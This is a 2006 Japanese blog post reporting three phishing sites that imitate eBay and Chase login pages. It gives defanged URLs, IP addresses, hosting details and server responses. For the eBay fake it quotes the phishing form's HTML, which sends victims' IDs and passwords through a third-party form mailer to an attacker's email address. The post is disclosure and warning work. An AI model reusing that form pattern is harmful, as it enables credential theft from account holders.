Mobile it! 広告及びスポンサー募集中: 詳しくは banner AT rep2.rbl.jp にお問い合わせください
Prev 2006.4 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
Today: Yesterday: Total:

April 17, 2006

● ebay.comの偽サイト ttp://mujweb.cz/www/signininehrhe/signin.ebay.htm?r=7638
ClamAVでHTML.Phishing.Auction-105と検知されています。

mujweb.cz自体は無料のサービスのようですが過去に何回かフィッシングのページがつくられています

アドレスは212.47.13.223でチェコ、逆引きはatlas223.a2.atlas.czです。

wwwサーバーの応答はBad Requestとなります。

ebay

IDとパスワード詐取画面です。ソースを見ると以下のようになっていて他のサイトにある出来の悪い(セキィリティホールのある)フォームを使ってdany_seff@yahoo.comに送られるようになっています。

<FORM NAME="ContactForm" ACTION="http://webtools.infi.net/cgi-bin/webforms.pl" METHOD="POST">
<INPUT TYPE=hidden NAME=mailto VALUE="dany_seff@yahoo.com">
<INPUT TYPE=hidden NAME=mailsubject VALUE="USERE - eBay userid and pass">


● chase.comの偽サイト ttp://mail.travla.com/.chase.com/index.php?prospect_nfpb=trueportlet_change_1_actionOverrideFchaseonlineFchangeFverifyDetails_windowLabel_portlet_change_pageLabel_page_change
mail.travla.comのアドレスは206.14.132.102でアメリカ、逆引きは同じmail.travla.comです。

トップページはWebmail画面なのでクラックされて開設されたものと判断できます。

サーバーの応答はApache/2.0.40 (Red Hat Linux)です。

chase

何回かやったのですがログインに失敗します。

chase

エラー画面、この時点でIDとパスワードが詐取されています。

● chase.comの偽サイト ttp://0x3a6613aa/panachart/shots/%20/.cgi/www.chaseonline.chase.com/Security-Accounts/login-run/UsingSsl/prdata/userprofile/custserv/chase/WebTeller/orteisapi.dll/BankTag/security/information/user-data-profile/Chase-Manhattan.us/
コンテンツはすでに消されています。

0x3a6613aaのアドレスは58.102.19.170で韓国、逆引きはありません。

現在のサーバーの応答は Apache/2.0.55 (Unix) PHP/5.1.1 と返ります。
— posted by staff @ 08:10AM | TrackBack(0)